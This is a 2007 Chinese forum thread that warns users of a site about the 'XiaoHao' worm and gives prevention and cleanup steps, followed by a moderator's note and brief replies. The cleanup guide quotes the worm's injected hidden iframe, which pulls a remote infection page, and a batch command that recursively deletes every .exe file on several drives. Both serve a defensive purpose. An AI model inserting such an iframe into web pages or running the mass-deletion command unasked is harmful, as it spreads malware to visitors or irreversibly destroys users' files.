找回密码
 注册

QQ登录

只需一步,快速开始

查看: 2657|回复: 8
收起左侧

[注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

[复制链接]
  • TA的每日心情
    开心
    2016-3-27 14:15
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    发表于 2007-8-18 10:49 | 显示全部楼层 |阅读模式
    [ADMINOPE=吟风听月|天上月神|威望由 0 减少至 -1|第二次违反版规|1187868897][这个贴子最后由叶秋霜在 2007/08/26 11:22 第 1 次编辑]

    [color=#DC143C]叶秋霜寄语:
       由于楼主在其他版块发表过无实际意义的帖子所以导致被降低威望。
       希望大家和楼主一起共勉, 多发有意义的帖子。
       例如这个预防“小浩病毒”的帖子就不错,有警示意义。
       我相信: 只有好帖子,才有存在的理由。
       谢谢。

    (以下是楼主原贴全部内容)
       这几天,一个名为“小浩”(Worm/XiaoHao.a)的新蠕虫病毒在互联网上现身,该病毒可以感染*.exe可执行文件,并将所有被感染的可执行文件图标变为一个“浩”字,目录标题栏会被增加“已中毒 X14o-H4o';s Virus”字样,如图:

    “小浩”病毒与“熊猫烧香”蠕虫病毒极为相似,除了可以感染*.exe可执行程序,并将所以被感染的可执行文件图标变为一个“浩”字以外,病毒还会感染各种网页脚本程序,将正常网页插入带毒网址,并且可以通过U盘进行传播。值得注意的是该病毒的破坏能力甚至超过了“熊猫烧香”,被感染的*.exe文件将遭到彻底破坏,即使专业的数据恢复公司也无法恢复——除非你有干净的备份。
    该病毒会通过浏览器、autorun.inf等途径感染系统,因此要预防该病毒,必须同时做好以下几方面:
    1、立即升级杀毒软件的病毒库——如果你的杀毒软件不能升级,还是卸了吧,没有任何用处。
    2、对重要数据(特别是exe文件,htm、php等网页文件)进行备份——不要备份到本地硬盘,那样和没备份有何区别?如果备份到本地硬盘,请使用Winrar打包备份,这样病毒将不认识备份文件。
    3、备份注册表
    3、使用Windows Update为系统打上补丁,特别是MS-06014、MS-07017,以及ANI漏洞的补丁。
    4、彻底禁止操作系统的自动播放功能
  • TA的每日心情
    开心
    2016-3-27 14:15
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2007-8-18 10:50 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    如果你已经感染了该病毒,当你重新启动(一般手工杀毒必要步骤)后系统就会崩溃,因为病毒可能已经感染了你所有的exe文件,包括系统核心exe文件(比如ntoskrnl.exe、ntkrnlpa.exe等),这些文件遭到破坏,系统将无法启动。
    所以一旦感染了该病毒,基本上就是对系统宣判了死刑——理论上讲是有办法不重装系统的,你需要将所有病毒进程干掉以保证当前的工作环境干净,并保证不再运行任何已被感染的病毒文件,不在让病毒通过任何途径被唤醒,然后拿出安装盘去修复系统文件,然后删除所有病毒文件和已感染文件,修复所有被病毒破坏的注册表项、网页文件等,搞定!
    但是我想如果你不是手工杀毒老手,还是老老实实的格盘,重装系统吧。如果你还是想试试,建议你首先把所有重要数据(哪怕是被感染了的)做备份,然后再试。
    以下方法适用于重装系统及以后的过程:
    1、插入安装盘,格式化C盘(或者你之前安装系统的盘),然后重装系统。
    2、必须设置足够复杂的密码,并且在进行完第5步之前拔掉你的网线!
    3、当你进入系统后,切记不要双击打开任何盘,否则你的系统就白装了!如果你非要打开,那么请使用右键菜单中的“打开”选项。
    4、除系统盘外其他的所有盘里如果没有重要数据,建议直接格式化(在进行步骤4前千万不要双击打开任何盘!!)。如果有重要数据,并且那些数据不是exe文件,请运行CMD打开命令行,执行以下命令:
    FOR %I IN (d:,e:,f DO CD /D %I & FOR %J IN (*.exe,autorun.inf) DO DEL %J /A HS /F /S
    该命令的作用是删除D\E\F盘下所有目录的所有exe文件(因为被感染了,且无法修复,不删除还留着做纪念啊?),以及每个盘根目录下的autorun.inf文件。这里没有写C盘(第一个括号),因为默认C盘是系统盘,如果你的系统装到了X盘,就把X盘不写,其他所有的盘符按照第一个括号里的格式补充进去。
    请注意:这一步的删除操作是无法返回的,请确认你那些exe文件都没用了再进行。
    5、检查所有的htm\html\php\jsp\asp\aspx文件,删除这些文件代码中的以下行(在进行步骤5前千万不要双击打开这些文件!!):
    <iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
    该步操作的原因是病毒会在这些文件中写入以上这句代码,任何人打开这些文件都会自动浏览上面这个链接,而浏览链接的直接结果就是:再次中毒!
    6、截至到这一步,病毒留下的东西就被消灭干净了,现在要做的是预防!插上网线,按照本帖1楼的方法立刻开始预防!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2007-8-18 21:39 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    嗯,顶一下。
    标红,让大家注意一下。
    (本公子这厢有礼了。)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2007-8-18 22:25 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    只要将杀软更新为最新病毒库的,这个不是问题。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-4 11:38
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    发表于 2007-8-19 00:31 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    辛苦了。呵呵,预防为先
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2007-8-20 21:54 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    谢谢提醒,警惕中......
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-27 14:15
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2007-8-23 20:29 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    不是吧!!这样也减少威望!!!!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2007-8-26 11:29 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    下面引用由天上月神2007/08/23 20:29 发表的内容:
    不是吧!!这样也减少威望!!!!
    楼主也以为是这帖有问题呢。
    为了避免误解,我在主帖上加了话,请楼主见谅。
    (本公子这厢有礼了。)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-5-18 10:44
  • 签到天数: 69 天

    连续签到: 1 天

    [LV.6]常住居民II

    发表于 2007-8-26 16:02 | 显示全部楼层

    [注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!

    支持斑竹.......
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    QQ|小黑屋|《唐诗宋词》网站 ( 苏ICP备2021032776号 )

    GMT+8, 2024-11-26 05:13 , Processed in 0.080297 second(s), 18 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2021, Tencent Cloud.

    快速回复 返回顶部 返回列表